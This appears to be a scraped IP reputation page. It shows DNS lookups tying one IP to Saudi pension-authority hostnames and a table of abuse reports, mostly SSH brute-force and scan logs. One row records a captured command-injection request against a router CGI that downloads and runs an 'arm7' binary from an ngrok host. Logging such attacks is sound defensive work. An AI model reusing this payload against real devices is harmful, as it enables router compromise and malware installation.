城市(city): unknown
省份(region): unknown
国家(country): Saudi Arabia
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 212.93.214.219
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54758
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;212.93.214.219. IN A
;; AUTHORITY SECTION:
. 331 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022021800 1800 900 604800 86400
;; Query time: 55 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 19 01:36:40 CST 2022
;; MSG SIZE rcvd: 107219.214.93.212.in-addr.arpa domain name pointer eservices.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer www.ppa.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer www.egksa.com.
219.214.93.212.in-addr.arpa domain name pointer bitaqati-t-auth.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer bitaqati.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer bitaqati-t.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer erpservices.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer mithaq.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer mobile.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer services.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer www.pension.gov.sa.
219.214.93.212.in-addr.arpa domain name pointer bayanat.pension.gov.sa.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
219.214.93.212.in-addr.arpa name = mobile.pension.gov.sa.
219.214.93.212.in-addr.arpa name = services.pension.gov.sa.
219.214.93.212.in-addr.arpa name = www.pension.gov.sa.
219.214.93.212.in-addr.arpa name = bayanat.pension.gov.sa.
219.214.93.212.in-addr.arpa name = eservices.pension.gov.sa.
219.214.93.212.in-addr.arpa name = pension.gov.sa.
219.214.93.212.in-addr.arpa name = www.ppa.gov.sa.
219.214.93.212.in-addr.arpa name = www.egksa.com.
219.214.93.212.in-addr.arpa name = bitaqati-t-auth.pension.gov.sa.
219.214.93.212.in-addr.arpa name = bitaqati.pension.gov.sa.
219.214.93.212.in-addr.arpa name = bitaqati-t.pension.gov.sa.
219.214.93.212.in-addr.arpa name = erpservices.pension.gov.sa.
219.214.93.212.in-addr.arpa name = mithaq.pension.gov.sa.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 114.237.109.157 | attack | SpamScore above: 10.0 |
2020-04-17 13:06:44 |
| 158.69.222.2 | attackspambots | SSH auth scanning - multiple failed logins |
2020-04-17 13:09:34 |
| 109.116.196.174 | attack | Apr 17 00:27:28 ny01 sshd[9931]: Failed password for root from 109.116.196.174 port 54568 ssh2 Apr 17 00:31:34 ny01 sshd[10559]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=109.116.196.174 Apr 17 00:31:37 ny01 sshd[10559]: Failed password for invalid user en from 109.116.196.174 port 35170 ssh2 |
2020-04-17 12:34:40 |
| 106.124.137.103 | attackbotsspam | Invalid user postgres from 106.124.137.103 port 40502 |
2020-04-17 12:48:20 |
| 129.205.112.253 | attackspambots | Invalid user protect from 129.205.112.253 port 60490 |
2020-04-17 12:43:29 |
| 178.237.236.247 | attackbotsspam | C1,WP GET /wp-login.php |
2020-04-17 13:01:50 |
| 80.211.34.241 | attackbotsspam | 2020-04-17T04:22:18.314619abusebot.cloudsearch.cf sshd[31419]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.34.241 user=root 2020-04-17T04:22:19.870411abusebot.cloudsearch.cf sshd[31419]: Failed password for root from 80.211.34.241 port 46268 ssh2 2020-04-17T04:27:11.735414abusebot.cloudsearch.cf sshd[32152]: Invalid user test from 80.211.34.241 port 34692 2020-04-17T04:27:11.743157abusebot.cloudsearch.cf sshd[32152]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.34.241 2020-04-17T04:27:11.735414abusebot.cloudsearch.cf sshd[32152]: Invalid user test from 80.211.34.241 port 34692 2020-04-17T04:27:13.856027abusebot.cloudsearch.cf sshd[32152]: Failed password for invalid user test from 80.211.34.241 port 34692 ssh2 2020-04-17T04:30:59.611872abusebot.cloudsearch.cf sshd[32532]: Invalid user admin from 80.211.34.241 port 41802 ... |
2020-04-17 12:38:49 |
| 46.101.209.178 | attackbots | $f2bV_matches |
2020-04-17 12:57:38 |
| 157.245.207.198 | attackspam | Apr 17 00:57:32 firewall sshd[18271]: Failed password for root from 157.245.207.198 port 37610 ssh2 Apr 17 01:00:43 firewall sshd[18352]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.245.207.198 user=root Apr 17 01:00:44 firewall sshd[18352]: Failed password for root from 157.245.207.198 port 32846 ssh2 ... |
2020-04-17 13:10:04 |
| 14.63.168.98 | attackbots | Invalid user jason from 14.63.168.98 port 18614 |
2020-04-17 13:14:31 |
| 150.109.23.36 | attack | Honeypot hit. |
2020-04-17 13:02:21 |
| 84.195.214.207 | attackspam | port scan and connect, tcp 23 (telnet) |
2020-04-17 13:13:10 |
| 189.252.106.18 | attackspam | /cgi-bin/mainfunction.cgi%3Faction=login%26keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27%26loginUser=a%26loginPwd=a |
2020-04-17 13:16:13 |
| 45.55.177.170 | attackbots | $f2bV_matches |
2020-04-17 12:49:17 |
| 139.59.23.89 | attack | Apr 17 05:01:04 web8 sshd\[17206\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.23.89 user=root Apr 17 05:01:06 web8 sshd\[17206\]: Failed password for root from 139.59.23.89 port 63249 ssh2 Apr 17 05:05:10 web8 sshd\[19538\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.23.89 user=root Apr 17 05:05:12 web8 sshd\[19538\]: Failed password for root from 139.59.23.89 port 15331 ssh2 Apr 17 05:09:16 web8 sshd\[21707\]: Invalid user nisec from 139.59.23.89 Apr 17 05:09:16 web8 sshd\[21707\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.23.89 |
2020-04-17 13:12:37 |